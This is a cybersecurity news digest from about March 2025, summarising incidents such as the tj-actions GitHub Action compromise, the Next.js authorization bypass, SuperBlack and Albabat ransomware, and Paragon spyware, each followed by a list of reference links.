CyberSecurity news

FlagThis - #cybersecurity

@itpro.com //
References: Rescana , Wiz Blog | RSS feed , Dan Goodin ...
A supply chain attack has targeted the widely used GitHub Action 'tj-actions/changed-files-action,' leading to the leakage of secrets from numerous repositories. This incident, first reported by Step Security, involved the compromise of the action, allowing attackers to inject malicious code into CI workflows. This code was designed to dump CI runner memory, potentially exposing sensitive information like API keys and passwords in public repository workflow logs. The compromised 'tj-actions/changed-files' repository and the GitHub gist hosting the malicious script have since been removed to mitigate further exploitation.

This vulnerability, assigned CVE-2025-30066, affected all versions of 'tj-actions/changed-files' as of March 15, 2025. The malicious code was introduced through a spoofed commit from the Renovate bot, enabling unauthorized access and modification of the action's code. While no external exfiltration of secrets to an attacker-controlled server has been observed, the exposure within affected repositories remains a significant risk. Impacted organizations are urged to take immediate action to mitigate the risk of credential theft and CI pipeline compromise, particularly in public repositories where secrets in workflow logs are publicly accessible.

Recommended read:
References :
  • Rescana: GitHub Actions Security Breach: tj-actions/changed-files-action Supply Chain Vulnerability Analysis
  • Wiz Blog | RSS feed: GitHub Action tj-actions/changed-files supply chain attack: everything you need to know
  • Open Source Security: tj-action/changed-files GitHub action was compromised
  • Dan Goodin: Is anyone following this breach involving the j-actions/changed-files GitHub Action? Seems pretty major, but I'm still trying to figure out exactly what's going on, who's affected, and what people (and how many) are affected. If you can help me get up to speed please DM me on Signal -- DanArs.82, or on Mastodon
  • securityonline.info: Popular GitHub Action “tj-actions/changed-filesâ€� Compromised (CVE-2025-30066)
  • Risky Business Media: Risky Bulletin: GitHub supply chain attack leaks secrets
  • www.itpro.com: Organizations urged to act fast after GitHub Action supply chain attack
  • : Tj-actions Supply Chain Attack Exposes 23,000 Organizations
  • Latio Pulse: Understanding and Re-Creating the tj-actions/changed-files Supply Chain Attack discusses the tj-actions/changed-files supply chain attack.
  • The Register - Security: GitHub supply chain attack spills secrets from 23,000 projects
  • BleepingComputer: Supply chain attack on popular GitHub Action exposes CI/CD secrets
  • www.cybersecuritydive.com: Supply chain attack against GitHub Action triggers massive exposure of secrets
  • Metacurity: A GitHub Action used in 23,000 repos was compromised in a supply chain attack
  • gbhackers.com: Supply Chain Attack Targets 23,000 GitHub Repositories
  • hackread.com: Malicious Code Hits ‘tj-actions/changed-files’ in 23,000 GitHub Repos
  • www.infoworld.com: Thousands of open source projects at risk from hack of GitHub Actions tool
  • bsky.app: Bsky Social - A supply chain attack on the widely used 'tj-actions/changed-files' GitHub Action, used by 23,000 repositories, potentially allowed threat actors to steal CI/CD secrets from GitHub Actions build logs.
  • Wiz Blog | RSS feed: New GitHub Action supply chain attack: reviewdog/action-setup
  • unit42.paloaltonetworks.com: Threat Assessment: GitHub Actions Supply Chain Attack: The Compromise of tj-actions/changed-files
  • Legit Security Blog: Github Actions tj-actions/changed-files Attack
  • Security Risk Advisors: TB2025318 – GitHub Action “tj-actions/changed-filesâ€� Compromised to Leak Secrets for Repositories Using the CI/CD Workflow
  • securityaffairs.com: GitHub Action tj-actions/changed-files was compromised in supply chain attack
  • bsky.app: A cascading supply chain attack that began with the compromise of the "reviewdog/action-setup@v1" GitHub Action is believed to have led to the recent breach of "tj-actions/changed-files" that leaked CI/CD secrets.
  • blog.gitguardian.com: Compromised tj-actions/changed-files GitHub Action: A look at publicly leaked secrets
  • Kaspersky official blog: Supply chain attack via GitHub Action | Kaspersky official blog
  • Risky Business Media: Risky Business #784 -- GitHub supply chain attack steals secrets from 23k projects
  • thecyberexpress.com: CISA Warns of Exploited GitHub Action CVE-2025-30066 – Users Urged to Patch
  • The DefendOps Diaries: Understanding the GitHub Action Supply Chain Attack
  • Sam Bent: GitHub Action Vulnerability: Supply Chain Attack Exposes Limited Secrets, Raises Broader Concerns
  • Schneier on Security: Critical GitHub Attack
  • Aembit: GitHub Action tjactions/changed-files Supply Chain Breach Exposes NHI Risks in CI/CD
  • www.cybersecurity-insiders.com: GitHub Supply Chain Attack Raises Awareness Across The Cybersecurity Community
  • tl;dr sec: [tl;dr sec] #271 - Threat Modeling (+ AI), Backdoored GitHub Actions, Compromising a Threat Actor's Telegram

@cyberalerts.io //
A critical vulnerability has been discovered in the widely-used Next.js framework, identified as CVE-2025-29927. This flaw allows attackers to bypass authorization checks within the framework's middleware system. Middleware is commonly used to enforce authentication, authorization, path rewriting, and security-related headers, making this vulnerability particularly severe. Vercel, the company behind Next.js, disclosed the issue on March 21st, 2025, highlighting its potential impact on services relying on vulnerable versions of the framework.

To mitigate the risk, developers using Next.js version 11 or higher are urged to update to the patched versions: 15.2.3, 14.2.25, 13.5.9, or 12.3.5. For those unable to immediately update, a temporary workaround involves blocking user requests with the 'x-middleware-subrequest' header. Some hosting platforms, like Vercel and Netlify, have already implemented this measure to protect their users. The vulnerability allows login screens to be bypassed without proper credentials, potentially compromising user data and sensitive information.

Recommended read:
References :
  • securityonline.info: Urgent: Patch Your Next.js for Authorization Bypass (CVE-2025-29927)
  • Open Source Security: Re: CVE-2025-29927: Authorization Bypass in Next.js Middleware
  • isc.sans.edu: ISC SANS posting on the Next.js vulnerability
  • bsky.app: It is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.
  • Lobsters: How to find Next.js on your network
  • Strobes Security: When security vulnerabilities appear in popular frameworks, they can affect thousands of websites overnight. That’s exactly what’s happening with a newly discovered Next.js vulnerability, one of the most widely used...
  • securityaffairs.com: Critical Next.js Vulnerability Allows Attackers to Bypass Middleware Authorization Checks
  • Open Source Security: CVE-2025-29927: Authorization Bypass in Next.js Middleware
  • socradar.io: Next.js Middleware Vulnerability (CVE-2025-29927): What You Need to Know and How to Respond
  • thehackernews.com: Critical Next.js Vulnerability Allows Attackers to Bypass Middleware Authorization Checks
  • securityboulevard.com: CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability
  • BleepingComputer: Critical flaw in Next.js lets hackers bypass authorization
  • Help Net Security: Help Net Security reports on the critical Next.js authentication bypass vulnerability.
  • cyberscoop.com: Researchers raise alarm about critical Next.js vulnerability
  • Legit Security Blog: Next.js Vulnerability: What You Need to Know
  • Resources-2: Discovered a critical vulnerability affecting Next.js middleware, tracked as CVE-2025-29927.
  • The DefendOps Diaries: Understanding and mitigating CVE-2025-29927: a critical Next.js vulnerability
  • Developer Tech News: Critical security flaw uncovered in Next.js framework
  • nsfocusglobal.com: Next.js Middleware Permission Bypass Vulnerability (CVE-2025-29927)
  • www.techradar.com: Critical security flaw in Next.js could spell big trouble for JavaScript users
  • infosec.exchange: : Critical in NextJS (CVE-2025-29927) impacts all NextJS versions before 15.2.3, 14.2.25, 13.5.9, 12.3.5 allowing attackers to bypass authorisation checks. Great explanation and a Proof-of-Concept demonstration by @_JohnHammond 👇
  • SOC Prime Blog: CVE-2025-29927 Next.js Middleware Authorization Bypass Vulnerability
  • Kali Linux Tutorials: CVE-2025-29927 : Next.js Middleware Authorization Bypass – Technical Analysis
  • DEVCLASS: Next.js team fixes vuln that allows authorization bypass when middleware is used, revises documentation recommending this method
  • Rescana: Executive Summary The discovery of CVE-2025-29927 , a critical vulnerability in Next.js , has raised significant cybersecurity concerns...
  • Stormshield: A critical authentication bypass vulnerability impacting the Next.js middleware has been reported. It has been assigned the reference CVE-2025-29927 and a CVSS 3.1 score of 9.1. It should be noted that proof of concept are publicly available about this CVE-2025-29927 vulnerability.
  • Fastly Security Blog: CVE-2025-29927: Authorization Bypass in Next.js
  • hackread.com: Researchers have uncovered a critical vulnerability (CVE-2025-29927) in Next.js middleware, allowing authorization bypass. Learn about the exploit and fixes.

Vasu Jakkal@Microsoft Security Blog //
Microsoft has unveiled a significant expansion of its Security Copilot platform, integrating AI agents designed to automate security operations tasks and alleviate the workload on cybersecurity professionals. This move aims to address the increasing volume and complexity of cyberattacks, which are overwhelming security teams that rely on manual processes. The AI-powered agents will handle routine tasks, freeing up IT and security staff to tackle more complex issues and proactive security measures. Microsoft detected over 30 billion phishing emails targeting customers between January and December 2024 highlighting the urgent need for automated solutions.

The expansion includes eleven AI agents, six developed by Microsoft and five by security partners, set for preview in April 2025. Microsoft's agents include the Phishing Triage Agent in Microsoft Defender, Alert Triage Agents in Microsoft Purview, Conditional Access Optimization Agent in Microsoft Entra, Vulnerability Remediation Agent in Microsoft Intune, and Threat Intelligence Briefing Agent in Security Copilot. These agents are purpose-built for security, designed to learn from feedback, adapt to workflows, and operate securely within Microsoft’s Zero Trust framework, ensuring that security teams retain full control over their actions and responses.

Recommended read:
References :
  • The Register - Software: AI agents swarm Microsoft Security Copilot
  • Microsoft Security Blog: Microsoft unveils Microsoft Security Copilot agents and new protections for AI
  • .NET Blog: Learn how the Xbox services team leveraged .NET Aspire to boost their team's productivity.
  • Ken Yeung: Microsoft’s First CTO Says AI Is ‘Three to Five Miracles’ Away From Human-Level Intelligence
  • SecureWorld News: Microsoft Expands Security Copilot with AI Agents
  • www.zdnet.com: Microsoft's new AI agents aim to help security pros combat the latest threats
  • www.itpro.com: Microsoft launches new security AI agents to help overworked cyber professionals
  • www.techrepublic.com: After Detecting 30B Phishing Attempts, Microsoft Adds Even More AI to Its Security Copilot
  • eSecurity Planet: esecurityplanet.com covers Fortifying Cybersecurity: Agentic Solutions by Microsoft and Partners
  • Microsoft Security Blog: AI innovation requires AI security: Hear what’s new at Microsoft Secure
  • www.csoonline.com: Microsoft has introduced a new set of AI agents for its Security Copilot platform, designed to automate key cybersecurity functions as organizations face increasingly complex and fast-moving digital threats.
  • SiliconANGLE: Microsoft introduces AI agents for Security Copilot
  • SiliconANGLE: Microsoft Corp. is enhancing the capabilities of its popular artificial intelligence-powered Copilot tool with the launch late today of its first “deep reasoning” agents, which can solve complex problems in the way a highly skilled professional might do.
  • Ken Yeung: Microsoft is introducing a new way for developers to create smarter Copilots.
  • Source Asia: Microsoft Security Copilot agents and more security innovations
  • www.computerworld.com: Microsoft’s Newest AI Agents Can Detail How They Reason

@cyberalerts.io //
The FBI has issued a warning about the rising trend of cybercriminals using fake file converter tools to distribute malware. These tools, often advertised as free online document converters, are designed to trick users into downloading malicious software onto their computers. While these tools may perform the advertised file conversion, they also secretly install malware that can lead to identity theft, ransomware attacks, and the compromise of sensitive data.

The threat actors exploit various file converter or downloader tools, enticing users with promises of converting files from one format to another, such as .doc to .pdf, or combining multiple files. The malicious code, disguised as a file conversion utility, can scrape uploaded files for personal identifying information, including social security numbers, banking information, and cryptocurrency wallet addresses. The FBI advises users to be cautious of such tools and report any instances of this scam to protect their assets.

The FBI Denver Field Office is warning that they are increasingly seeing scams involving free online document converter tools and encourages victims to report any instances of this scam. Malwarebytes has identified some of these suspect file converters, which include Imageconvertors.com, convertitoremp3.it, convertisseurs-pdf.com and convertscloud.com. The agency emphasized the importance of educating individuals about these threats to prevent them from falling victim to these scams.

Recommended read:
References :
  • Talkback Resources: FBI warns of malware-laden websites posing as free file converters, leading to ransomware attacks and data theft.
  • gbhackers.com: Beware! Malware Hidden in Free Word-to-PDF Converters
  • www.bitdefender.com: Free file converter malware scam “rampantâ€� claims FBI
  • Malwarebytes: Warning over free online file converters that actually install malware
  • bsky.app: Free file converter malware scam "rampant" claims FBI.
  • bsky.app: @bushidotoken.net has dug up some IOCs for the FBI's recent warning about online file format converters being used to distribute malware
  • Help Net Security: FBI: Free file converter sites and tools deliver malware
  • www.techradar.com: Free online file converters could infect your PC with malware, FBI warns
  • bsky.app: Free file converter malware scam "rampant" claims FBI.
  • Security | TechRepublic: Scam Alert: FBI ‘Increasingly Seeing’ Malware Distributed In Document Converters
  • securityaffairs.com: The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. The FBI warns that threat actors use malicious online document converters to steal users’ sensitive information and infect their systems with malware.
  • The DefendOps Diaries: FBI warns against fake file converters spreading malware and stealing data. Learn how to protect yourself from these cyber threats.
  • PCMag UK security: PSA: Be Careful Around Free File Converters, They Might Contain Malware
  • www.bleepingcomputer.com: FBI warnings are true—fake file converters do push malware
  • www.techradar.com: FBI warns some web-based file management services are not as well-intentioned as they seem.
  • www.csoonline.com: Improvements Microsoft has made to Office document security that disable macros and other embedded malware by default has forced criminals to up their innovation game, a security expert said Monday.
  • www.itpro.com: Fake file converter tools are on the rise – here’s what you need to know
  • Cyber Security News: The FBI Denver Field Office has warned sternly about the rising threat of malicious online file converter tools. These seemingly harmless services, often advertised as free tools to convert or merge files, are being weaponized by cybercriminals to install malware on users’ computers. This malware can have devastating consequences, including ransomware attacks and identity theft. […]

Bill Toulas@BleepingComputer //
A new ransomware campaign is underway, leveraging critical vulnerabilities in Fortinet's FortiOS and FortiProxy systems. The SuperBlack ransomware, deployed by the cybercriminal group Mora_001, targets Fortinet firewalls by exploiting authentication bypass flaws, specifically CVE-2024-55591 and CVE-2025-24472. Once inside, attackers escalate privileges to super-admin and create new administrator accounts, modifying automation tasks to ensure persistent access, even if initially removed.

The vulnerabilities, disclosed in January and February of 2025, allow attackers to gain unauthorized access and encrypt devices after the initial compromise, attackers map the network and attempt lateral movement using stolen VPN credentials and newly added VPN accounts. They utilize Windows Management Instrumentation (WMIC), SSH, and TACACS+/RADIUS authentication, which are protocols for managing and authenticating network access. Organizations are urged to patch their Fortinet systems to mitigate the risk of SuperBlack ransomware attacks.

Recommended read:
References :
  • The DefendOps Diaries: SuperBlack Ransomware: Exploiting Fortinet Vulnerabilities
  • BleepingComputer: New SuperBlack ransomware exploits Fortinet auth bypass flaws
  • Industrial Cyber: Researchers from Forescout Technologies‘ Forescout Research – Vedere Labs identified a series of intrusions exploiting two Fortinet vulnerabilities
  • The Register - Security: New kids on the ransomware block channel Lockbit to raid Fortinet firewalls
  • www.cybersecuritydive.com: SuperBlack ransomware strain used in attacks targeting Fortinet vulnerabilities
  • Blog: Fortinet flaws targeted by new LockBit-like SuperBlack ransomware
  • securityaffairs.com: SuperBlack Ransomware operators exploit Fortinet Firewall flaws in recent attacks
  • www.cybersecuritydive.com: SuperBlack ransomware strain used in attacks targeting Fortinet vulnerabilities
  • www.csoonline.com: Researchers tracked the exploits back to late November/early December last year.
  • techcrunch.com: Hackers are exploiting Fortinet firewall bugs to plant ransomware
  • Security Risk Advisors: New SuperBlack ransomware exploits Fortinet vulnerabilities for network breaches
  • Cyber Security News: CISA Warns: Fortinet FortiOS Vulnerability Actively Exploited
  • gbhackers.com: CISA Issues Security Warning on Fortinet FortiOS Authentication Bypass Exploit
  • securityonline.info: Cybersecurity Alert: CISA Adds Fortinet and GitHub Action Vulnerabilities to Exploited List
  • cyble.com: CISA Alerts Users of CVE-2025-24472
  • securityaffairs.com: U.S. CISA adds Fortinet FortiOS/FortiProxy and GitHub Action flaws to its Known Exploited Vulnerabilities catalog
  • www.it-daily.net: SuperBlack ransomware exploits Fortinet vulnerability
  • : Fortinet Vulnerability Exploited in Ransomware Attack, CISA Warns The US Cybersecurity and Infrastructure Security Agency added flaws in Fortinet and a popular GitHub Action to its Known Exploited Vulnerabilities catalog
  • chemical-facility-security-news.blogspot.com: CISA Adds FortiGuard Vulnerability to KEV Catalog – 3-18-25

Nathaniel Morales@feeds.trendmicro.com //
The Albabat ransomware has evolved, now targeting Windows, Linux, and macOS systems, according to recent research. This marks a significant expansion in the group's capabilities, showcasing increased sophistication in exploiting multiple operating systems. Trend Micro researchers uncovered this evolution, noting the ransomware group leverages GitHub to streamline their operations, enhancing the efficiency and reach of their attacks.

Albabat ransomware version 2.0 gathers system and hardware information on Linux and macOS systems and uses a GitHub account to store and deliver configuration files. This allows attackers to manage operations centrally and update tools efficiently. The GitHub repository, though private, is accessible through an authentication token, demonstrating active development through its commit history.

Recent versions of Albabat ransomware retrieve configuration data through the GitHub REST API, utilizing a User-Agent string labeled "Awesome App." It encrypts file extensions, including .exe, .dll, .mp3, and .pdf, while ignoring folders like Searches and AppData. The ransomware also terminates processes like taskmgr.exe and regedit.exe to evade detection. It tracks infections and payments through a PostgreSQL database, potentially selling stolen data.

Recommended read:
References :
  • Cyber Security News: The Albabat ransomware has expanded its operation by utilizing GitHub to streamline its operation.
  • gbhackers.com: The Albabat ransomware group has been observed expanding its operations to target not only Windows but also Linux and macOS systems, marking a significant evolution in its capabilities. They are leveraging GitHub to streamline their ransomware operations.
  • : Trend Micro observed a continuous development of Albabat ransomware, designed to expand attacks and streamline operations. The authors seem to be targeting Linux and macOS systems now.
  • www.trendmicro.com: New versions of Albabat ransomware have been detected that target Windows, Linux, and macOS devices. The group is utilizing GitHub to streamline their operations.
  • hackread.com: New Attacks Exploit Year-Old ServiceNow Flaws – Israel Hit Hardest
  • Carly Page: Mastodon: Hackers are ramping up attempts to exploit a trio of year-old ServiceNow vulnerabilities to break into unpatched company instances
  • techcrunch.com: TechCrunch: Hackers are ramping up attacks using year-old ServiceNow security bugs to break into unpatched systems
  • www.scworld.com: Attacks involving ServiceNow vulnerabilities escalate
  • bsky.app: Albabat Ransomware Group Potentially Expands Targets to Multiple OS, Uses GitHub to Streamline Operations https://buff.ly/IWRowB3
  • Talkback Resources: New Attacks Exploit Year-Old ServiceNow Flaws - Israel Hit Hardest [app] [exp]
  • www.itpro.com: Old ServiceNow vulnerabilities could cause havoc for unpatched customers
  • Rescana: ServiceNow Vulnerabilities: Critical Exploits Impacting Israel and Global Systems
  • Cyber Security News: Albabat Ransomware Adds Linux and macOS to its Expanding List of Targets
  • gbhackers.com: Albabat Ransomware Expands Reach to Target Linux and macOS Platforms
  • www.cysecurity.news: Albabat Ransomware Evolves with Cross-Platform Capabilities and Enhanced Attack Efficiency
  • ciso2ciso.com: New versions of the Albabat ransomware target Windows, Linux, and macOS, and retrieve configuration files from GitHub. The post appeared first on SecurityWeek.

Sergiu Gatlan@BleepingComputer //
EncryptHub, a group linked to RansomHub, has been identified as the actor exploiting a zero-day vulnerability in Microsoft Management Console (MMC). Tracked as CVE-2025-26633, this flaw allows attackers to bypass security features and execute malicious code on vulnerable Windows systems. The vulnerability stems from improper input sanitization within MMC, a core administrative tool. Attackers are leveraging this flaw through email and web-based attacks, delivering malicious payloads to unsuspecting users, bypassing Windows file reputation protections.

The exploit, dubbed 'MSC EvilTwin', manipulates .msc files and the Multilingual User Interface Path (MUIPath) to execute malicious payloads, maintain persistence, and steal sensitive data. Specifically, attackers create two .msc files with the same name, a clean one and a malicious counterpart. When the legitimate file is run, MMC inadvertently picks the rogue file from a directory named "en-US" and executes it, unbeknownst to the user. This sophisticated technique allows EncryptHub to deploy various malware families, including Rhadamanthys and StealC, information stealers which pose a severe risk to affected organizations.

Recommended read:
References :
  • The DefendOps Diaries: Understanding the CVE-2025-26633 Vulnerability in Microsoft Management Console
  • www.trendmicro.com: Trend Research identified Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console that attackers exploit to execute malicious code and exfiltrate data.
  • Cyber Security News: Hackers Exploit Windows MMC Zero-Day Vulnerability to Execute Malicious Code
  • BleepingComputer: A threat actor known as EncryptHub has been linked to Windows zero-day attacks exploiting a Microsoft Management Console vulnerability patched this month.
  • gbhackers.com: Windows MMC Framework Zero-Day Exploited to Execute Malicious Code
  • www.scworld.com: Windows-targeted EncryptHub attacks involve MMC zero-day exploitation
  • bsky.app: EncryptHub, an affiliate of RansomHub, was behind recent MMC zero-day patched this month by Microsoft
  • The Hacker News: EncryptHub Exploits Windows Zero-Day to Deploy Rhadamanthys and StealC Malware
  • Virus Bulletin: Trend Micro researchers identified a campaign by the Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console that attackers exploit to execute malicious code and exfiltrate data.
  • www.cybersecuritydive.com: A threat actor known as “EncryptHub” began exploiting the zero-day vulnerability before it was patched earlier this month.
  • : Trend Micro researchers identified a campaign by the Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console that attackers exploit to execute malicious code and exfiltrate data.
  • www.trendmicro.com: Trend Research discusses the delivery methods, custom payloads, and techniques used by Water Gamayun, the suspected Russian threat actor abusing a zero-day vulnerability in the Microsoft Management Console framework (CVE-2025-26633) to execute malicious code on infected machines.

Andres Ramos@Arctic Wolf //
A resurgence of a fake CAPTCHA malware campaign has been observed, with threat actors compromising widely used websites across various industries. They are embedding a fake CAPTCHA challenge that redirects victims to a site triggering PowerShell code execution. This campaign exploits social engineering tactics and fake software downloads to deceive users into executing malicious scripts.

This tactic is also utilized with fake captchas which resemble legitimate sites. When users attempt to pass the captcha, they are prompted to execute code that has been copied to their clipboard. The OBSCURE#BAT malware campaign is a major cybersecurity threat to both individuals and organizations, primarily due to its ability to compromise sensitive data through advanced evasion techniques, including API hooking. This allows the malware to hide files and registry entries, making detection difficult.

Recommended read:
References :
  • Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
  • hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
  • Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
  • SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
  • www.zdnet.com: That weird CAPTCHA could be a malware trap - here's how to protect yourself
  • Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
  • www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
  • : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
  • Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users’ clipboards, leading to the installation of information-stealing malware.
  • Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
  • www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
  • gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
  • Sucuri Blog: Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
  • securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites

Paolo Tarsitano@Cyber Security 360 //
Citizen Lab researchers have identified several countries as potential customers of Paragon Solutions' Graphite spyware, which was used in attacks against human rights defenders. The investigation mapped the infrastructure of the Israel-based spyware maker, identifying servers likely used by customers in Australia, Canada, Cyprus, Denmark, Israel, and Singapore. The findings follow WhatsApp's notification to numerous individuals that Paragon exploited the platform to deliver spyware to their phones.

The Citizen Lab report includes an infrastructure analysis of Graphite, a forensic analysis of infected devices belonging to members of civil society, and a closer look at the spyware's use in Canada and Italy. Meta (WhatsApp) confirmed these details were pivotal to their ongoing investigation into Paragon which allowed them to fix a zero-click exploit.

Paragon’s executive chairman, John Fleming, responded that Citizen Lab shared only a "very limited amount of information" beforehand, "some of which appears to be inaccurate," while declining to specify what was inaccurate. Despite Paragon's claims of selling only to democracies, the report raises concerns about potential abuse, suggesting their safeguards may not be sufficient.

Recommended read:
References :
  • infosec.exchange: Researchers mapped out the infrastructure of spyware maker Paragon Solutions, and say they were able to identify servers likely used by customers in several countries: Australia, Canada, Cyprus, Denmark, Israel, and Singapore. Paragon’s executive chairman John Fleming said Citizen Lab shared in advance "very limited amount of information, some of which appears to be inaccurate." He declined to say what was inaccurate exactly.
  • The Citizen Lab: In our first investigation into Israel-based spyware company, Paragon Solutions, we begin to untangle multiple threads connected to the proliferation of Paragon's mercenary spyware operations across the globe. This report includes an infrastructure analysis of Paragon’s spyware product, called Graphite; a forensic analysis of infected devices belonging to members of civil society; and a closer look at the use of Paragon spyware in both Canada and Italy. —
  • techcrunch.com: Researchers name several countries as potential Paragon spyware customers
  • CyberInsider: Paragon’s Spyware ‘Graphite’ Used in WhatsApp Attacks
  • securityaffairs.com: WhatsApp fixed zero-day flaw used to deploy Paragon Graphite spyware
  • Zack Whittaker: Researchers at Citizen Lab have named several countries as potential customers of Paragon's Graphite spyware, which Citizen Lab says was used in a widespread campaign targeting human rights defenders in Italy.
  • Metacurity: Australia, Canada, Cyprus, Denmark, Israel, and Singapore likely bought Paragon spyware, Citizen Lab
  • The Hacker News: Six Governments Likely Use Israeli Paragon Spyware to Hack IM Apps and Harvest Data
  • BleepingComputer: WhatsApp patched zero-day flaw used in Paragon spyware attacks
  • Cyber Security 360: Italia spiata: svelata la rete dello spyware Paragon Graphite
  • hackread.com: Israeli Spyware Graphite Targeted WhatsApp with 0-Click Exploit
  • The Register - Security: Paragon spyware deployed against journalists and activists, Citizen Lab claims
  • Christoffer S.: A First Look at Paragon's Proliferating Spyware Operations" investigates Paragon Solutions, an Israeli spyware vendor founded in 2019 that sells a product called Graphite.
  • IT-Connect: Une faille zero-click sur WhatsApp a été exploitée par un spyware de Paragon, à l'aide d'un simple document PDF.
  • Zack Whittaker: This week's edition of ~ this week in security ~ includes a look at Citizen Lab's report revealing Paragon spyware customers and victims, CISA scrambling to contact fired staff after court reverses layoffs, and Wiz joining Google Cloud. Plus, a brand new cyber cat, and more. Sign up/RSS: Read online: Donate/support:

Carly Page@TechCrunch //
The Pennsylvania State Education Association (PSEA), the largest public-sector union in Pennsylvania, has announced a significant data breach affecting over 500,000 members. The breach, which occurred in July 2024, resulted in attackers stealing sensitive personal information. PSEA is now notifying the impacted individuals about the incident and the potential risks.

The stolen data includes highly sensitive information, such as government-issued identification documents, Social Security numbers, passport numbers, medical information, and financial data like card numbers with PINs and expiration dates. Member account numbers, PINs, passwords, and security codes were also accessed. PSEA took steps to ensure, to the best of its ability and knowledge, that the stolen data was deleted.

Recommended read:
References :
  • bsky.app: The Pennsylvania State Education Association (PSEA), the largest public-sector union in Pennsylvania, is notifying over half a million individuals that attackers stole their personal information in a July 2024 security breach.
  • BleepingComputer: The Pennsylvania State Education Association (PSEA), the largest public-sector union in Pennsylvania, is notifying over half a million individuals that attackers stole their personal information in a July 2024 security breach.
  • techcrunch.com: US teachers’ union says hackers stole sensitive personal data on over 500,000 members
  • www.bleepingcomputer.com: Pennsylvania education union data breach hit 500,000 people
  • The Register - Security: Attackers swipe data of 500k+ people from Pennsylvania teachers union
  • The DefendOps Diaries: Understanding the PSEA Data Breach: Lessons and Future Prevention
  • : The Pennsylvania State Education Association (PSEA) has sent breach notifications to over 500,000 current and former members
  • Zack Whittaker: Pennsylvania's biggest union for educators had a data breach, exposing over half a million members' personal information.
  • securityaffairs.com: Pennsylvania State Education Association data breach impacts 500,000 individuals
  • Carly Page: The Pennsylvania State Education Association says hackers stole the sensitive personal and financial information of more than half a million of its members.  PSEA said it “took steps†to ensure the stolen data was deleted, suggesting it was the target of a ransomware or data extortion attack, and subsequently paid a ransom demand to the hackers responsible
  • www.techradar.com: Data breach at Pennsylvania education union potentially exposes 500,000 victims

do son@securityonline.info //
Cybercriminals are actively exploiting the Signal messaging application to distribute an information-stealing Remote Access Trojan (RAT), raising serious privacy concerns. According to a recently published report, a cybercriminal group identified as UNC-200 is behind the campaign, which involves targeting high-value individuals within Ukraine's defense sector. The Computer Emergency Response Team of Ukraine (CERT-UA) has issued warnings about this campaign, which utilizes the Dark Crystal RAT (aka DCRat) to compromise systems.

This malicious activity involves distributing messages via Signal that contain what appears to be meeting minutes. These messages are sent from compromised accounts to enhance credibility, enticing unsuspecting users to download malicious archive files. The archives contain a decoy PDF and an executable that deploys the DCRat malware, giving attackers remote access and control, stealing valuable information and executing arbitrary commands. CERT-UA attributes this activity to UAC-0200, active since summer 2024, who noted that the use of popular messengers increases the attack surface, including due to the creation of uncontrolled information exchange channels.

Recommended read:
References :
  • cyberinsider.com: Ukraine Warns Signal Used for Spreading RATs on High-Value Targets
  • securityonline.info: CERT-UA Alert: DarkCrystal RAT Deployed via Signal in Ukraine
  • SOC Prime Blog: Detect UAC-0200 Attacks Using DarkCrystal RAT
  • The DefendOps Diaries: Russian Cyber Espionage Targets Ukrainian Military via Signal
  • BleepingComputer: Ukrainian military targeted in new Signal spear-phishing attacks
  • BleepingComputer: Ukraine's Computer Emergency Response Team (CERT-UA) is warning about highly targeted attacks employing compromised Signal accounts to send malware to employees of defense industry firms and members of the country's army forces.
  • securityaffairs.com: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
  • The Hacker News: CERT-UA Warns: Dark Crystal RAT Targets Ukrainian Defense via Malicious Signal Messages
  • BleepingComputer: Ukraine's Computer Emergency Response Team (CERT-UA) is warning about highly targeted attacks employing compromised Signal accounts to send malware to employees of defense industry firms and members of the country's army forces.
  • Sam Bent: Report: Cybercriminals Leverage Signal App to Deploy Info-Stealing RAT, Raising Privacy Concerns
  • bsky.app: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
  • www.scworld.com: Attackers, tracked under the UAC-0200 threat cluster, leveraged the Signal messaging app to deliver messages purportedly containing minutes of the meeting reports as archive files.

@cyberalerts.io //
UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, has been actively targeting critical infrastructure entities in Taiwan since at least 2023. Cisco Talos researchers have been tracking this campaign. The group utilizes a combination of web shells, such as the Chopper web shell, and open-sourced tooling to conduct post-compromise activities, focusing on persistence in victim environments for information theft and credential harvesting. UAT-5918 exploits N-day vulnerabilities in unpatched web and application servers exposed to the internet to gain initial access.

UAT-5918's post-compromise activities involve manual operations, emphasizing network reconnaissance and credential harvesting using tools like Mimikatz, LaZagne, and browser credential extractors. The threat actor deploys web shells across discovered sub-domains and internet-accessible servers, establishing multiple entry points. Their tactics, techniques, and procedures (TTPs) overlap with other APT groups like Volt Typhoon and Flax Typhoon, suggesting shared strategic goals in targeting geographies and industry verticals such as telecommunications, healthcare, and information technology sectors in Taiwan.

Recommended read:
References :
  • Cisco Talos Blog: UAT-5918 targets critical infrastructure entities in Taiwan
  • Industrial Cyber: UAT-5918 APT group targets Taiwan critical infrastructure, possible linkage to Volt Typhoon
